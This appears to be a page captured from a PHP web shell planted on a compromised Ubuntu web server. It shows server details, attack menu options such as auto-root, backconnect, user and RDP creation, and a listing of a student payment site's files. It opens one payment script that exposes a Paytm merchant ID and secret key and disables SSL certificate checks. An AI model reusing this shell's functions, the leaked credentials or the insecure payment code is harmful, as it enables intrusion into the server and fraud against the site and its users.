Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.146.107.223
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
student /
gfgcg /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
axis
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
hdfc
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
jquery-ui-1.9
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
razorpay
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tarka_pdf
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
CHECK_TxnStatuss.php
1.3
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
axis_response.php
4.22
KB
-rwxr-xr-x
candidate_list.html
4.78
KB
-rwxr-xr-x
cconfig.php
1.38
KB
-rwxr-xr-x
cconfig_old.php
1.32
KB
-rwxr-xr-x
config_paytm.php
1.44
KB
-rwxr-xr-x
cronjob_sendsms.php
2.5
KB
-rwxr-xr-x
index.php
4.13
KB
-rwxr-xr-x
payment_gate_way_responce.php
6.59
KB
-rwxr-xr-x
payment_gateway.php
8.41
KB
-rwxr-xr-x
pgResponse.php
10.73
KB
-rwxr-xr-x
sendsmsapi.php
760
B
-rwxr-xr-x
student.php
4.19
KB
-rwxr-xr-x
subjectDetails.php
1.14
KB
-rwxr-xr-x
verify.php
10.88
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CHECK_TxnStatuss.php
<?php // following file need to be included require_once("Paytm/lib/encdec_paytm.php"); $orderId = "37677347"; $merchantMid = "Bengal67365349004712"; $merchantKey = "JSVPzyZzG_J7bcjM"; $paytmParams["MID"] = $merchantMid; $paytmParams["ORDERID"] = $orderId; $paytmChecksum = getChecksumFromArray($paytmParams, $merchantKey); $paytmParams['CHECKSUMHASH'] = urlencode($paytmChecksum); $postData = "JsonData=".json_encode($paytmParams, JSON_UNESCAPED_SLASHES); $connection = curl_init(); // initiate curl // $transactionURL = "https://securegw.paytm.in/merchant-status/getTxnStatus"; // for production $transactionURL = "https://securegw-stage.paytm.in/merchant-status/getTxnStatus"; curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($connection, CURLOPT_URL, $transactionURL); curl_setopt($connection, CURLOPT_POST, true); curl_setopt($connection, CURLOPT_POSTFIELDS, $postData); curl_setopt($connection, CURLOPT_RETURNTRANSFER, true); curl_setopt($connection, CURLOPT_HTTPHEADER, array('Content-Type: application/json')); $responseReader = curl_exec($connection); $responseData = json_decode($responseReader, true); echo "<pre>"; print_r($responseData); echo "</pre>"; ?>
Close